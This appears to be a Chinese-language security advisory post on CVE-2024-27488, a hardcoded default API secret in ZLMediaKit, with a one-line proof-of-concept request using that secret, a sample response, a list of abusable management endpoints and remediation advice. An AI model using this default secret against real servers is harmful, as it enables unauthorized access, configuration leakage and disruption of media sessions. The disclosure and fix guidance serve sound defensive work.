CVE-2024-27488_ ZLMediaKit 安全漏洞

CVSS评分:9.8分

CVE-2024-27488_ ZLMediaKit 安全漏洞

  • [1. 漏洞原理](#1. 漏洞原理)
  • [2. 漏洞危害](#2. 漏洞危害)
  • [3. 漏洞修复](#3. 漏洞修复)

1. 漏洞原理

CVE-2024-27488 是 ZLMediaKit 的"硬编码/默认 API 密钥"导致的访问控制缺陷 ------ ZLMediaKit 默认开启 HTTP 管理/控制 API,使用 secret 参数做认证,但默认/示例配置里有硬编码的 secret/示例 secret(或弱随机值),攻击者可利用这一点绕过认证,调用管理类 API(获取配置、会话、控制流、删除/添加代理、kick 等),实现信息泄露或权限滥用。

漏洞参考链接:

硬编码的地址:https://docs.zlmediakit.com/guide/media_server/config_file.html

漏洞验证 poc:

xml 复制代码
GET /index/?secret=035c73f7-bb6b-4889-a715-d9eb2d1925cc

请求的响应类似于:

json 复制代码
{
  "code" : 0,
  "data" : [
    "/index/",
    "/index/api/addFFmpegSource",
    "/index/api/addStreamProxy",
    "/index/api/addStreamPusherProxy",
    "/index/api/closeRtpServer",
    ...
  ]
}

2. 漏洞危害

该漏洞利用难度极低,通过未授权调用 api 接口,可实现一些未授权的操作,例如:

  • /index/api/getServerConfig --- 获取服务配置(可能泄露路径、密钥等)
  • /index/api/getMediaList --- 当前流列表与来源信息
  • /index/api/getAllSession --- 会话/连接详情
  • /index/api/kick_session --- 踢掉会话(验证时请勿滥用)

3. 漏洞修复

conf/config.ini 或运行参数中明确设置强随机 secret(足够长度,字母+数字+符号),并且不要使用示例/默认值 035c73f7-bb6b-4889-a715-d9eb2d1925cc

相关推荐
枷锁—sha4 小时前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
聚铭网络4 小时前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
darkb1rd6 小时前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell
世界尽头与你11 小时前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
独行soc11 小时前
2026年渗透测试面试题总结-20(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
枷锁—sha1 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1191 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
独行soc1 天前
2026年渗透测试面试题总结-17(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
独行soc1 天前
2026年渗透测试面试题总结-18(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
ESBK20251 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信